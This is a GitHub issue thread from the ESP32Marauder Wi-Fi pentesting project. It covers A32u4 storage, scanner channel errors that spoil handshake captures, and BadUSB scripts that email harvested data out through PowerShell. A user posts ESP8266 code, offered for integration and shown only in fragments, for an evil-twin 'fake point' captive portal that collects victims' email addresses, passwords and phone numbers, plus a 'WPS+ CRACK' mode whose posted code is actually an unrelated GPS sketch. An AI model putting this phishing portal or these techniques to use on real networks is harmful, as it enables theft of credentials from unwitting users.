justcallmekoko/ESP32Marauder #80: Add to A32u4 memory card

stratm0r, 2021-05-02:
Good day. Can you add to the code connecting a memory card in the A32u4 for download and upload data?

justcallmekoko, 2021-05-06:
I am not sure what it is you are asking for. What do we need to connect and memory card to the A32u4 for?

stratm0r, 2021-05-06:
In order to be able to use it as an external memory for copying information from tested devices.

justcallmekoko, 2021-05-10:
So do you mean having the computer see the A32u4 as a mass storage device or do you mean have the A32u4 take info from a computer and store it on an SD card?

stratm0r, 2021-05-10:
As it will be easier for you.  However, it is better for the PC to see the A32u4 as a mass storage device.

justcallmekoko, 2021-05-10:
Understood. I will see if I can get that working then.
Do you have an example code already prepared for the A32u4

stratm0r, 2021-05-10:
I haven't thought about it yet.  But I can think about it with you) (sorry for the bad English, I'm Russian).

justcallmekoko, 2021-05-10:
actually this bootloader would make programming REALLY convenient. It looks like you just drop a new FLASH.BIN file onto the root of the storage drive that spawns when you plug in the a32u4.

stratm0r, 2021-05-10:
Maybee great idea) Although I thought it would be easier to solder a separate memory card to the A32u4 and edit the sketch accordingly.

stratmor, 2021-05-10:
[image]
[image]

justcallmekoko, 2021-05-10:
The main reason I would not do that is because that would have to be a 3rd party modification to the marauder hardware itself and I don't want to include more firmware for unofficial hardware features in the project.

If the storage is really needed, the a32u4 can take in the data from the PC, pass it to the ESP32 over UART, and the ESP32 can write it to the SD card it is already connected to.

I think this bootloader idea would be great as long as the a32u4 can still function as a keyboard. I have a feeling it might not work though because I don't think the a32u4 can appear as a mass storage device AND a HID as the same time.

If you want to try it out, try flashing [this bootloader](https://github.com/joric/lufa/tree/promicro/Bootloaders/MassStorage) to an arduino pro micro or something and upload a USB Rubber Duck code or something. I would do it myself right now but I am not home at the moment.

That is probably one of the coolest DIY marauders I have seen so far! That is awesome!

justcallmekoko, 2021-05-10:
Excellent let me know how it works. Also would you mind sharing a picture of the back of your project? I am curious to see what it looks like.

stratmor, 2021-05-10:
Now it looks like this)

[image]
[image]

stratmor, 2021-05-10:
Be careful with that firmware. Now I will try to restore the A32u4 bootloader after it.

justcallmekoko, 2021-05-10:
what happened with the bootloader?

justcallmekoko, 2021-05-10:
I got it to work

justcallmekoko, 2021-05-10:
I used a USBASP just as they said in the repo but it can be done with Arduino as ISP probably.

The hex file that was included in the "precompiled" directory did not work so I followed the steps to build it from source. I think that is what worked.

justcallmekoko, 2021-05-11:
@stratm0r let me know if you are able to get it working. I am happy to answer any other questions

justcallmekoko, 2021-05-11:
I was not able to try the keyboard yesterday. I had to do a live stream and I ran out of time to test. I will probably give it a try today.

Before I compiled the bootloader from source, I did try the precompiled bootloader and it DID NOT work. If you are not able to compile it from source yourself, I can send you the bootloader I compiled

stratm0r, 2021-05-11:
I would be very grateful to you) There is no way to compile the sources at work (.

justcallmekoko, 2021-05-11:
Gotcha. I am also at work at the moment and I won't be home for another 8 hours. If you haven't compiled it by the time I get home, I will send you the file.

justcallmekoko, 2021-05-11:
Thanks you too. Also do you have an Instagram I can tag when I post the pictures of your DIY marauder? I would like to give you credit

justcallmekoko, 2021-05-11:
Here is the [bootloader](https://github.com/justcallmekoko/ESP32Marauder/blob/master/bootloaders/BootloaderMassStorage2.hex)

justcallmekoko, 2021-05-11:
Yes you are correct

stratm0r, 2021-05-12:
Didn't create a separate ticket.  However, I would like to emphasize.  There is some problem in the AP scanner.  The scanner does not correctly identify the AP channel.  And the attack is made on the adjacent (previous) channel with the AP.  As a result, it is ineffective.

stratm0r, 2021-05-12:
I added a bit to the Scanner AP code to be able to see the channels and saw this problem.  But I have not yet understood why this is happening.

justcallmekoko, 2021-05-12:
Are you referring to the scan that is executed when you select "Scan AP" on the menu?

stratm0r, 2021-05-12:
My point is that we can improve the result if we uniquely identify the channel on which the target access point is operating.  Today I tested the device at one of these points.  She was on channel 10.  The frame was captured from the 9th.  The marauder's scanner detected it on channel 9, although it worked on channel 10. As a result, we lost 1 key from the handshake.  The other three were received and saved.  And the duplicate sniffer got and saved all 4. The result was obtained both there and there - but I suppose we could improve the accuracy of the marauder.  And what do you think? Now I will show with an example what I mean ...

justcallmekoko, 2021-05-12:
Gotcha I understand. I would appreciate an example. Also could you open a new issue and include the code change you are talking about?

stratmor, 2021-05-12:
I could not understand in any way the reason of not frequent failures in obtaining EAPOL of interest to me. After you published the AP scanner, I made minor edits there for my own convenience. They concerned the display of the AP channel (there is no point in publishing this). And I was surprised by what you can see in the picture. In this case, the UKrtelecom access point operates on channel 7. But the marauder shows 6. Keenetic at 13 - but the marauder shows 12. I may be wrong, I'm a beginner - but, as I understand it, the data received by the scanner and sniffers of the marauder have the same working mechanism. This means that the EAPOL Sniffer also receives data from adjacent channels and not from the channel on which the AP is operating. Can it be so?
[image]
[image]

stratmor, 2021-05-12:
The data of a separate scanner in the upper right corresponds to the truth (these are my access points and I myself chose the channels for them)).

justcallmekoko, 2021-05-12:
Some access points send broadcast frames on channels adjacent to their normal channel if I understand my reading correctly. I would double check the beacon frames of those access points with wireshark and see if they still show up on channel 6 AND 7. But like I said earlier, the marauder display the channel is found the beacon on. It could be that the channel tuning of the ESP32 is garbage in which case we would have to maintain some sort of buffer for each network found and set its channel to which ever channel received the most beacon frames for that network.

stratmor, 2021-05-12:
I can make a .pcap file, if it can be useful to you) What to do?

justcallmekoko, 2021-05-12:
I won't be able to open a pcap file since I don't have wireshark at work.

stratmor, 2021-05-12:
Sorry, I thought you were at home and not busy) If you have the opportunity and if you are not busy, please contact me. I do not distract) ...

justcallmekoko, 2021-05-12:
I don't have anything keeping me busy at the moment. That is why I am able to respond. I just can't test right now that's all but I can answer questions.

justcallmekoko, 2021-05-18:
So I can't really think of a solution to grab files from the target computer using the A32u4. Have you thought of anything yet?

justcallmekoko, 2021-05-18:
I think this is the reason people write badusb scripts that compile the sensitive data on the PC and email it using powershell instead of putting it on a USB

stratm0r, 2021-05-18:
Good day) Yes, there are thoughts to try to solder the USB-Hub microcircuit.  It seems that this problem cannot be solved programmatically. Or organize this hub on ESP8266.  I came across this solution somewhere.

stratm0r, 2021-05-18:
By the way, there are several proposals (it would be possible to organize connection to WPS PBC as one of the options and extract the WPA2-PSK password directly from the access point) Or integrate a fake access point into the looter with the return of the data entered into it (this is similar to "Fluxion")  ...  I have already implemented all this in my device and, if you want, I can give you a ready-made code.

justcallmekoko, 2021-05-18:
I would like to look at the source code for that. That sounds interesting. Do you also have some documentation that explains how it works at a high level?

justcallmekoko, 2021-05-18:
Have you implemented the thing that is similar to fluxion?

stratm0r, 2021-05-18:
Something similar.  The code is not mine.  I only slightly modified it to suit my interests.  This is actually a popular local project.  Do you have a telegram?  Or is it convenient for you to talk here?)

justcallmekoko, 2021-05-18:
I do not have telegram. This is the easiest method for communication during the work day. Outside of work, the easiest is discord

stratm0r, 2021-05-18:
In my performance, it now looks like this:
[image]

justcallmekoko, 2021-05-18:
I am assuming `WPS+ CRACK` is the new "fluxion" attack, correct?

stratm0r, 2021-05-18:
This is a simple code for connecting ESP8266 to an access point using WPS PBC protocol, which returns the password from it (WPA2-PSK).  Something similar to Fluxion is a "Fake point".

stratmor, 2021-05-18:
`#include <Adafruit_SSD1306.h>
#include <splash.h>
#include <Adafruit_GFX.h>
#include <TinyGPS++.h> // Tiny GPS Plus Library
#include <WiFi.h> //ESP8266WiFi.h
#include <Wire.h>
#define SCREEN_WIDTH 128
#define SCREEN_HEIGHT 64
TinyGPSPlus gps; // Create an Instance of the TinyGPS++ object called gps
HardwareSerial SerialGPS(1); // The serial connection to the GPS device
Adafruit_SSD1306 display(SCREEN_WIDTH, SCREEN_HEIGHT, &Wire, -1);
const char* ssid = "ASUS33"; //ssid of your wifi
const char* password = "11q22w33e"; //password of your wifi
float latitude , longitude , speeds , heading;
int hour , minute , second, satellites , altitude , hdop;
String lat_str , lng_str, sat_str , speed_str , time_str, alt_str;
WiFiServer server(80);

void setup()
{
display.begin(SSD1306_SWITCHCAPVCC, 0x3C); // Initialize OLED display
display.clearDisplay(); // Clear OLED display
display.setTextSize(1); // Set OLED text size to small
display.setTextColor(WHITE); // Set OLED color to White
display.setCursor(0,0); // Set cursor to 0,0
display.drawRoundRect(0, 0, 128, 64, 1, WHITE);
display.println("   GPS receiver Pro ");
Serial.begin(115200);
SerialGPS.begin(9600, SERIAL_8N1, 16, 17); //16 - RX, 17 - TX
WiFi.begin(ssid, password);
while (WiFi.status() != WL_CONNECTED)// while wifi not connected
{
delay(500);
Serial.println("."); //print "...."
display.print(".");
}
Serial.println("");
display.println("");
Serial.println("  WiFi connected");
display.println("  WiFi connected");
server.begin();
Serial.println("Server started");
display.println("  Server started");
Serial.println(WiFi.localIP()); // Print the IP address
display.println(WiFi.localIP());
display.println("");
display.println(" WAIT GPS POSITION! ");
display.display(); // Update display
delay(5000); // Pause 5 seconds
display.clearDisplay();
}

void loop(){
while (SerialGPS.available() > 0) //while data is available
if (gps.encode(SerialGPS.read())) //read gps data
{
latitude = gps.location.lat();
lat_str = String(latitude , 6); // latitude location is stored in a string
longitude = gps.location.lng();
lng_str = String(longitude , 6); //longitude location is stored in a string
satellites = gps.satellites.value();
sat_str = satellites;
speeds = gps.speed.mph();
speed_str = String(speeds);
altitude = gps.altitude.meters();
alt_str = String(altitude);
time_str = "";
hour = gps.time.hour()+3;
minute = gps.time.minute();
second = gps.time.second();
time_str += String(hour); //values of hour,minute and time are stored in a string
time_str += ":";
if (minute < 10)
time_str += '0';
time_str += String(minute); //values of hour,minute and time are stored in a string
time_str += ":";
if (second < 10)
time_str += '0';
time_str += String(second); //values of hour,minute and time are stored in a string
heading = gps.course.deg();
hdop = gps.hdop.value();

display.clearDisplay();
display.setTextSize(1);
display.setCursor(0,0);
display.drawRoundRect(0, 0, 128, 64, 1, WHITE);
display.setCursor(2,2);
display.print(" IP - ");
display.println(WiFi.localIP());
display.print(" Time UTC : ");
display.print(gps.time.hour()+3); // GPS time UTC
display.print(":");
display.print(gps.time.minute()); // Minutes
display.print(":");
display.println(gps.time.second()); // Seconds
display.print(" Latitude : ");
display.println(latitude , 5);
display.print(" Longitude: ");
display.println(longitude , 5);
display.print(" Altitude : ");
display.println(altitude -8);
display.print(" Satellite: ");
display.println(gps.satellites.value());
display.print(" Speed    : ");
display.println(gps.speed.kmph());
display.display();
WiFiClient client = server.available(); // Check if a client has connected
if (!client)
{
return;
}
// Prepare the response
String s = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n <!DOCTYPE html> <html> <head> <title>GPS DATA</title> <style>";
s += "a:link {background-color: YELLOW;text-decoration: none;}";
s += "table, th, td </style> </head> <body> <h1 style=";
s += "font-size:300%;";
s += " ALIGN=CENTER> GPS DATA</h1>";
s += "<p ALIGN=CENTER style=""font-size:150%;""";
s += "> <b>Location Details</b></p><table ALIGN=CENTER style=";
s += "width:50%";
s += "> <tr> <th>Latitude</th>";
s += "<td ALIGN=CENTER >";
s += lat_str;
s += "</td> </tr> <tr> <th>Longitude</th> <td ALIGN=CENTER >";
s += lng_str;
s += "</td> </tr> <tr> <th>Altitude</th> <td ALIGN=CENTER >";
s += alt_str;
s += "</td> </tr> <tr> <th>Satellites</th> <td ALIGN=CENTER >";
s += sat_str;
s += "</td> </tr> <tr> <th>Speed</th> <td ALIGN=CENTER >";
s += speed_str;
s += "</td> </tr> <tr> <th>Heading</th> <td ALIGN=CENTER >";
s += heading;
s += "</td> </tr> <tr> <th>HDOP Precission</th> <td ALIGN=CENTER >";
s += hdop;
s += "</td> </tr> <tr> <th>Time</th> <td ALIGN=CENTER >";
s += time_str;
s += "</td> </tr> <tr> <th>Google Maps</th> <td ALIGN=CENTER >";
s += "<a href=\"http://maps.google.com/maps?&z=15&mrt=yp&t=k..";
s += lat_str;
s += '+';
s += lng_str;
s += "\">Click here!</a>";
s += "</td> </tr> </table> ";
s += "</body> </html>";
}
}
`

stratmor, 2021-05-18:
#include <Arduino.h>
#include <GyverButton.h>
#include <ESP8266WiFi.h>
#include <ESP8266WebServer.h>
#include <DNSServer.h>
#include <Adafruit_GFX.h>
#include <Adafruit_ssd1306syp.h>
#include <SPI.h>
#include <SD.h>
#include <Wire.h>
#include "notes.h"

#define LED_BUILTIN // 2 // GPIO4
#define BLINK (millis()%1000<500)?WHITE:BLACK
#define BLINKING_RATE 3 // in Hertz
#define BLINKING (millis()%(1000/BLINKING_RATE)<(500/BLINKING_RATE))?WHITE:BLACK

IPAddress local_IP(192,168,0,1);
IPAddress gateway(192,168,0,1);
IPAddress subnet(255,255,255,0);

DNSServer dnsServer;
ESP8266WebServer server(80);

const int buzzer = 15;
bool buzzerStatus = true;
const int chipSelect = 1;

File myFile;

int loginAttempts = 0;
String email = "";
String password = "";
String Mobile = "";

int enCode;
String enCod;

GButton up(0, HIGH_PULL);
GButton down(2, HIGH_PULL);
GButton ok(15, HIGH_PULL);

Adafruit_ssd1306syp oled(4,5);

void setup() {
  delay(50);
  oled.initialize();
  drawMenu();
  }
  void drawMenu() {
  oled.clear();
  oled.setTextColor(WHITE);
  oled.setTextSize(1);
  oled.setCursor(0, 0); 
  oled.println("      SCANNER AP");
  oled.println("      FAKE POINT");
  oled.println("      WPS+ CRACK");
  oled.drawRoundRect(0, 30, 127, 34, 1, WHITE);
  oled.update();
}

void loop() {
  static uint8_t pointer = 0;
  
  up.tick();                
  down.tick();
  ok.tick();

  if (up.isClick() or up.isHold()) {
    pointer = constrain(pointer - 1, 0, 2);
[... 499 lines cut ...]
  }
  page += "<br><br><b><u>Login Code</u></b><br><br>";
  page += "<form action=\"/login\" method=\"post\"><input type=\"text\" placeholder=\"code\"><input type=\"submit\" value=\"submit\"></form>";

  page += "<br><b><u>Register</u></b><br><br>";
  page += "<div style=\"text-align:right\">";
  page += "<form action=\"/register\" method=\"post\">Email: <input type=\"text\" name=\"email\" placeholder=\"name@service.com\" ><br>Password: <input type=\"password\" name=\"pass\" placeholder=\"password\"><br>Mobile No.: <input type=\"text\" name=\"no\" placeholder=\"+380.......\"><br></div><input type=\"submit\" value=\"submit\"></form>";
  page += "</center></div></body>";

  return page;
}

void loopFakeAP() {
oled.clear();
int percent = getBatteryLevel();
battSideBar(percent);
dnsServer.processNextRequest();
buzzerIcon();
noConnected();
noAttempts();
creds();
server.handleClient();
oled.update();
loopFakeAP();
}

stratm0r, 2021-05-18:
This is the complete code for the ESP8266.  I think you can integrate it into the marauder yourself if you wish)

justcallmekoko, 2021-05-18:
Just resending with formatting

- WPA+ CRACK
```C++
#include <Adafruit_SSD1306.h>
#include <splash.h>
#include <Adafruit_GFX.h>
#include <TinyGPS++.h> // Tiny GPS Plus Library
#include <WiFi.h> //ESP8266WiFi.h
#include <Wire.h>
#define SCREEN_WIDTH 128
#define SCREEN_HEIGHT 64
TinyGPSPlus gps; // Create an Instance of the TinyGPS++ object called gps
HardwareSerial SerialGPS(1); // The serial connection to the GPS device
Adafruit_SSD1306 display(SCREEN_WIDTH, SCREEN_HEIGHT, &Wire, -1);
const char* ssid = "ASUS33"; //ssid of your wifi
const char* password = "11q22w33e"; //password of your wifi
float latitude , longitude , speeds , heading;
int hour , minute , second, satellites , altitude , hdop;
String lat_str , lng_str, sat_str , speed_str , time_str, alt_str;
WiFiServer server(80);

void setup()
{
display.begin(SSD1306_SWITCHCAPVCC, 0x3C); // Initialize OLED display
display.clearDisplay(); // Clear OLED display
display.setTextSize(1); // Set OLED text size to small
display.setTextColor(WHITE); // Set OLED color to White
display.setCursor(0,0); // Set cursor to 0,0
display.drawRoundRect(0, 0, 128, 64, 1, WHITE);
display.println(" GPS receiver Pro ");
Serial.begin(115200);
SerialGPS.begin(9600, SERIAL_8N1, 16, 17); //16 - RX, 17 - TX
WiFi.begin(ssid, password);
while (WiFi.status() != WL_CONNECTED)// while wifi not connected
{
delay(500);
Serial.println("."); //print "...."
display.print(".");
}
Serial.println("");
display.println("");
Serial.println(" WiFi connected");
display.println(" WiFi connected");
server.begin();
Serial.println("Server started");
display.println(" Server started");
Serial.println(WiFi.localIP()); // Print the IP address
display.println(WiFi.localIP());
display.println("");
display.println(" WAIT GPS POSITION! ");
display.display(); // Update display
delay(5000); // Pause 5 seconds
display.clearDisplay();
}

void loop(){
while (SerialGPS.available() > 0) //while data is available
if (gps.encode(SerialGPS.read())) //read gps data
{
latitude = gps.location.lat();
lat_str = String(latitude , 6); // latitude location is stored in a string
longitude = gps.location.lng();
lng_str = String(longitude , 6); //longitude location is stored in a string
satellites = gps.satellites.value();
sat_str = satellites;
speeds = gps.speed.mph();
speed_str = String(speeds);
altitude = gps.altitude.meters();
alt_str = String(altitude);
[... 671 lines cut ...]
";
page += "<div style="text-align:right">";
page += "<form action="/register" method="post">Email: <input type="text" name="email" placeholder="name@service.com" >
Password: <input type="password" name="pass" placeholder="password">
Mobile No.: <input type="text" name="no" placeholder="+380.......">
<input type="submit" value="submit">";
page += "

";
return page;
}

void loopFakeAP() {
oled.clear();
int percent = getBatteryLevel();
battSideBar(percent);
dnsServer.processNextRequest();
buzzerIcon();
noConnected();
noAttempts();
creds();
server.handleClient();
oled.update();
loopFakeAP();
}```

stratmor, 2021-05-18:
[menuScaner.zip](https://github.com/justcallmekoko/ESP32Marauder/files/6501511/menuScaner.zip)

stratmor, 2021-05-18:
It will be more correct)

LuckyFishGeek, 2021-06-06:
@stratmor WiFi Swiss army！！！！I look forward to improving this project into a PCB project.

stratm0r, 2021-06-06:
@LuckyFishGeek, I have an understanding of how this can be implemented.  But, to my regret, I do not know how to work in the program for the design of printed circuit boards.  And I don't have the option to order parts.  I live where people have no opportunities at all.  I have been waiting for the details for this device for several months.  Friends from Russia helped me.  I understand the prospects of this project.  If someone could help me with designing a printed circuit board, I would build a schematic diagram of the device and send it.  As I see it.

LuckyFishGeek, 2021-06-06:
@stratm0r 
I can pcb design and would love to help you with this project. Do you have a more convenient chat tool? Other than Instagram. (I can't sign up for Instagram in my area)

stratm0r, 2021-06-06:
@LuckyFishGeek - yes, of course) In telegram: @ Specialist2.  In VKontakte: https://vk.com/id125609749.  In mail: specmail2@gmail.com. You can wherever it suits you) But i bad speak english - i used google translator)

justcallmekoko, 2021-06-07:
I am going to close this since there isn't a firmware solution that will work with the given official hardware configuration.

closed 2021-06-07 by justcallmekoko